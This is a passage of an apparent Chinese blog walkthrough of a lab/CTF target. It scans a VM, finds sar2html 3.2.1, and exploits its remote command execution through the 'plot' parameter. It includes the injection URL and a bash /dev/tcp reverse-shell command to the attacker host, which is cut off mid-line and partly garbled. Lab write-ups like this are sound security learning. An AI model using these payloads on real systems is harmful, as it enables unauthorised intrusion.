渗透思路:
nmap扫描----dirb扫描网站目录----exploit-db查找exp----利用sar2html的RCE漏洞getshell(base64编码)----利用定时任务提权
环境信息:靶机:192.168.101.65
攻击机:192.168.101.34
具体步骤: 1、nmap扫描sudo nmap -sV -sC -p- 192.168.101.65只扫描到80端口(http)
dirb http://192.168.101.65
查看http://192.168.101.65/robots.txt,发现sar2HTML
访问http://192.168.101.65/sar2HTML/,发现版本信息:sar2html Ver 3.2.1
在Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers中搜索sar2,得到2条版本匹配的结果,上面那条是个python脚本,下面那条是文字说明
查看下面那条Sar2HTML 3.2.1 - Remote Command Execution - PHP webapps Exploit
可以看出漏洞利用步骤很简单,只需要在http:///index.php?plot=;的处输入命令,然后点击select host下拉框即可
先用id命令尝试一下:
浏览器访问http://192.168.101.65/sar2HTML/index.php?plot=;id
然后点击select host下拉框,可以看到下拉框中包含id命令的执行结果
然后尝试getshell。
经尝试,这边bash反弹shell需要base64编码,具体方式如下:
先在攻击机上输入
echo "bash -i &>/dev/tcp/192.168.101.34/8888 /dev/tcp/192.168.101.34/7777
关注
打赏
![]()
1661867686
查看更多评论
最近更新
- 深拷贝和浅拷贝的区别(重点)
- 【Vue】走进Vue框架世界
- 【云服务器】项目部署—搭建网站—vue电商后台管理系统
- 【React介绍】 一文带你深入React
- 【React】React组件实例的三大属性之state,props,refs(你学废了吗)
- 【脚手架VueCLI】从零开始,创建一个VUE项目
- 【React】深入理解React组件生命周期----图文详解(含代码)
- 【React】DOM的Diffing算法是什么?以及DOM中key的作用----经典面试题
- 【React】1_使用React脚手架创建项目步骤--------详解(含项目结构说明)
- 【React】2_如何使用react脚手架写一个简单的页面?
